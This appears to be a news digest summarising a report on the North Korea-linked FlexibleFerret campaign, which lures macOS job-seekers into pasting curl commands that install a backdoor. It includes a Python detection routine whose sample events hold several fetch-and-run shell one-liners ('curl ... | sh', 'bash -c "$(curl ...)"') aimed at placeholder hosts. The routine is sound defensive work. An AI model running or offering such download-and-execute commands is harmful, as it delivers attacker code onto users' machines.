DPRK’s FlexibleFerret Tightens macOS Grip

Summary

Jamf Threat Labs reports that the DPRK-linked FlexibleFerret campaign continues to evolve, increasingly targeting macOS users with convincing fake recruitment workflows. The attackers use JavaScript-staged ‘interview’ pages that coax victims into pasting a curl command into Terminal, which fetches an architecture-aware shell loader (Intel or Apple silicon) and a Go-based backdoor. Newer tactics include a signed decoy app (MediaPatcher.app) that prompts for camera permissions and a Chrome-style system password dialogue to harvest credentials, then exfiltrates data (reportedly to Dropbox). The backdoor supports more commands than earlier variants, enabling system info collection, file upload/download, browser and keychain data harvesting, and reliable persistence.

Key Points

  • DPRK-aligned actor behind FlexibleFerret is actively refining macOS attacks, focusing on job-recruitment lures.
  • Attack flow: tailored ‘hiring assessment’ webpages → social-engineering to run a curl command → architecture-aware shell loader → Go backdoor.
  • New persistence and staging improvements include Intel/Apple silicon detection and a cleaner Go backdoor with expanded capabilities.
  • Signed decoy app (MediaPatcher.app) presents fake permission and password prompts to steal credentials and exfiltrate data.
  • Technique relies on tricking users to bypass macOS protections (Gatekeeper) by executing Terminal commands themselves.
  • Defensive advice: treat unsolicited interview assessments and Terminal ‘fix’ instructions as high risk; organisations should educate staff and monitor for related indicators.
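As an added example (not code from the Jamf or Dark Reading report), the following Python triage routine targets the step the attack flow hinges on: a download-and-execute one-liner pasted into Terminal. It scans constructed process-execution events (parent app plus command line), flags downloader-to-shell patterns, and raises the reasoning when the command also probes the CPU architecture. All hostnames and event lines are constructed placeholders, not indicators from the report.

```python
import re
from typing import List, NamedTuple, Optional, Tuple

class Finding(NamedTuple):
    parent: str
    cmdline: str
    reasons: Tuple[str, ...]

# Interactive terminal apps: a download-and-execute one-liner launched from
# one of these matches the "paste this into Terminal" lure described above.
TERMINAL_PARENTS = {"Terminal", "iTerm2"}

# A downloader piped straight into a shell:  curl ... | sh
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(?:sudo\s+)?(sh|bash|zsh)\b")
# A shell running downloaded content via command substitution:  bash -c "$(curl ...)"
SUBST_TO_SHELL = re.compile(r"\b(sh|bash|zsh)\b[^$]*\$\(\s*(curl|wget)\b")
# Architecture fingerprinting in the same one-liner (Intel vs Apple silicon).
ARCH_PROBE = re.compile(r"\buname\s+-m\b|\$\(\s*arch\s*\)")

# Constructed sample events; hostnames are placeholders, not real indicators.
SAMPLE_EVENTS = [
    ("Terminal", "curl -fsSL https://assessment.example.invalid/fix.sh | sh"),
    ("Terminal", 'bash -c "$(curl -s https://hiring.example.invalid/$(uname -m)/loader)"'),
    ("Terminal", "curl -o report.pdf https://intranet.example.invalid/report.pdf"),
    ("iTerm2", "git pull --rebase"),
    ("Terminal", "wget -qO- https://cdn.example.invalid/setup.sh | zsh"),
    ("Terminal", "brew install jq"),
]

def assess(parent: str, cmdline: str) -> Optional[Finding]:
    """Return a Finding when the command executes downloaded content, else None."""
    reasons = []
    if PIPE_TO_SHELL.search(cmdline):
        reasons.append("downloader piped to shell")
    if SUBST_TO_SHELL.search(cmdline):
        reasons.append("shell executes downloaded content via $(...)")
    if not reasons:
        return None  # a plain download to disk (curl -o file) is not flagged
    if parent in TERMINAL_PARENTS:
        reasons.append("launched from interactive terminal (user-pasted)")
    if ARCH_PROBE.search(cmdline):
        reasons.append("architecture probe in one-liner")
    return Finding(parent, cmdline, tuple(reasons))

def scan(events) -> List[Finding]:
    """Run assess() over (parent, cmdline) pairs and keep only the hits."""
    return [f for f in (assess(p, c) for p, c in events) if f is not None]
```

The heuristics are intentionally narrow; in a real deployment they would sit on top of an EDR process-event feed rather than a hard-coded list.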

Why should I read this?

Look — if you use a Mac and you apply for jobs online, this is worth two minutes of your time. Attackers are pretending to be recruiters, walking you through fake interview steps and getting you to run commands that let malware in. It isn’t flashy, but it’s effective and getting sharper.

Author style

Punchy: this isn’t just another macOS nuisance — FlexibleFerret shows a clear, targeted push at job-seekers and macOS endpoints. Security teams, HR and anyone who hires remotely should pay close attention: the social engineering is polished, the tooling is improved, and the consequences include stolen credentials and persistent backdoors.

Context and Relevance

This story fits into two ongoing trends: increased APT focus on macOS and highly tailored social-engineering campaigns exploiting remote-hiring workflows. As organisations rely more on remote interviews and online assessments, threat actors mimic legitimate processes to evade technical defences. The campaign underlines the limits of platform protections when users are persuaded to execute commands themselves, and it emphasises the need for combined technical controls and user awareness.

Source

Source: https://www.darkreading.com/cyberattacks-data-breaches/dprks-flexibleferret-tightens-macos-grip